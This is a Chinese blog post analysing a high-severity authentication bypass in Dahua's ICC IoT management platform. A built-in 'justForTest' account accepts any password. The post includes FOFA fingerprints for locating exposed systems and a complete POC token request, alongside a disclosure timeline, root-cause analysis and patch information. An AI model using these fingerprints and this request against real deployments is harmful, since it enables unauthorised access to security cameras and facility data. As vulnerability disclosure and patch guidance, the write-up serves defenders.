大华智能物联综合管理平台高危漏洞分析:justForTest后门账户引发的身份验证危机

一、漏洞概述

浙江大华技术股份有限公司的智能物联综合管理平台(ICC) 被曝存在严重身份验证漏洞。攻击者可通过内置账户 justForTest 配合任意密码直接登录系统,导致未授权访问及敏感信息泄露。该漏洞因身份校验逻辑缺陷形成“后门”,威胁等级为高危。

二、漏洞复现与验证

资产测绘:使用FOFA寻找智能物联综合管理平台指纹
icon_hash="-1935899595"
body="*客户端会小于800*"

漏洞复现:

平台基本页面:

使用Burp抓包修改数据

POC:


POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1

Host: {{Hostname}}

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

Content-Length: 109

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

Connection: close

username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=

返回包出现各种token证明漏洞存在

直接使用justForTest账户和任意密码登录

三、漏洞发现及扩散

首次公开披露

2023年12月17日:漏洞在技术社区(CN-SEC)首次曝光,披露ICC平台存在justForTest账户可配合任意密码登录的身份验证绕过漏洞,并提供了复现POC及Fofa测绘指纹。

2023年12月27日:漏洞细节进一步扩散至优快云等平台,新增Nuclei自动化检测脚本,推动漏洞进入规模化验证阶段。

2024年6月:漏洞被集成至“大华综合漏洞利用工具”,支持批量检测目标并自动化登录,显著降低攻击门槛。

黑产利用:暗网论坛出现利用该漏洞窃取的园区安防数据、工业监控录像交易记录,部分案例涉及关键基础设施。

漏洞根源推测:

根据技术分析,justForTest账户疑似开发阶段遗留的测试后门账户,未在生产环境清除且缺乏密码校验逻辑,属于典型“硬编码凭证”类漏洞。

四、补丁修复情况

官方修复进展

2025年1月15日:大华发布ICC平台多漏洞修复补丁(含CNVD-2025-00420),覆盖justForTest漏洞及关联高危漏洞(如GetClassValue命令执行漏洞)。

补丁获取途径:厂商官网提供安全版本升级(https://www.dahuatech.com/),但未单独发布该漏洞的专用补丁公告。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值